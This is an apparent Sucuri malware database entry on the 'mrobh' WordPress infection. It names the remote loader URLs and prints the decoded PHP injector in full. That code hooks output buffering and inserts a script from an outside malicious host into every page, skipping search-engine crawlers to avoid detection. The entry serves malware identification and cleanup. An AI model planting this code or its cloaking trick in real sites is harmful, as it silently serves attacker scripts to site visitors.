Already registered? Login
Sucuri Malware database
Name:
MW:MROBH:1
Description: Code used to insert a malicious javascript on many
wordpress sites. Loading the malware from:
http://www.indesignstudioinfo.com/ls.php
http://zettapetta.com/js.php
http://zettapetta.com/js2.php
http://holasionweb.com/oo.php
http://www.losotrana.com/js.php
Generally infecting the footer.php (or all PHP files in some cases).
Clean up:: Run the following script:
http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html
Malware dump (base 64 added to the .php files):
Decoded dump:
if(!function_exists('mrobh')) {
if(!function_exists('gml')) {
function gml() {
if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot") && (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))) {
return '<script src="http://indesignstudioinfo.com/ls.php"></script>';
}
return "";
}
}
if(!function_exists('gzdecode')) {
function gzdecode($var1) {
$var3=@ord(@substr($var1,3,1));
$var2=10;
if($var3&4) {
$var4=@unpack('v',substr($var1,10,2));
$var4=$var4[1];
$var2+=2+$var4;
}
if($var3&8) {
$var2=@strpos($var1,chr(0),$var2)+1;
}
if($var3&16) {
$var2=@strpos($var1,chr(0),$var2)+1;
}
if($var3&2) {
$var2+=2;
}
$var5=@gzinflate(@substr($var1,$var2));
if($var5===FALSE) {
$var5=$var1;
}
return $var5;
}
}
function mrobh($var6) {
Header('Content-Encoding: none');
$var7=gzdecode($var6);
if(preg_match('/\<\/body/si',$var7)) {
return preg_replace('/(\<\/body[^\>]*\>)/si', gml()."\n".'$1', $var7);
} else {
return $var7.gml();
}
}
ob_start('mrobh');
}
}
